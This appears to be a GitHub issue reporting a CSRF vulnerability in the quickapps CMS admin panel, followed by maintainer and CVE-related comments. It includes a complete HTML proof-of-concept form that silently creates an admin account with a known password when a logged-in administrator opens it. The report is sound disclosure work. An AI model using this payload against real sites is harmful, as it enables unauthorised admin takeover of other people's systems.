search

quickapps / cms

Modular CMS powered by CakePHP
GNU General Public License v3.0
164 stars 69 forks source link

CSRF issue that allows attacker to create an account #187

Open fvi-att opened 6 years ago

fvi-att commented 6 years ago

Hello. I'd like to report a security issue on the admin page.

Summary

this vuln is CSRF vuln that allows creating any kinds of account.

When an attacker induces authorized victims to a malicious webpage and make them send requests. a victim creates an account without their intent.

Reproduce

This is a step how to reproduce.

  1. Access to the html page contains the payload after you login to admin(/en_US/admin/) page.

Then you find an admin account named [test] is created.

Payloads

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://your.cms.domain.example.com/en_US/admin/user/manage/add" method="POST">
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="username" value="test" />
      <input type="hidden" name="email" value="test&#64;example&#46;com" />
      <input type="hidden" name="web" value="" />
      <input type="hidden" name="locale" value="" />
      <input type="hidden" name="status" value="0" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="password" value="testtest" />
      <input type="hidden" name="password2" value="testtest" />
      <input type="hidden" name="roles&#91;&#95;ids&#93;" value="" />
      <input type="hidden" name="roles&#91;&#95;ids&#93;&#91;&#93;" value="1" />
      <input type="hidden" name="welcome&#95;message" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

I think this security issue is not serious. Because attack using this vulnerability requires induction.

Event

botchris commented 6 years ago

Fixing CSRF in QACMS in general may produce several problem as QACMS heavily relies on AJAX and dynamic forms building. We could try to secure certain sections of the CMS, such as content/user editing forms, etc.

NicoleG25 commented 4 years ago

@ChristopherCastro do you plan to address this? note that a CVE was assigned to this issue. If you disagree with the assignment you may contact MITRE directly to reject the CVE.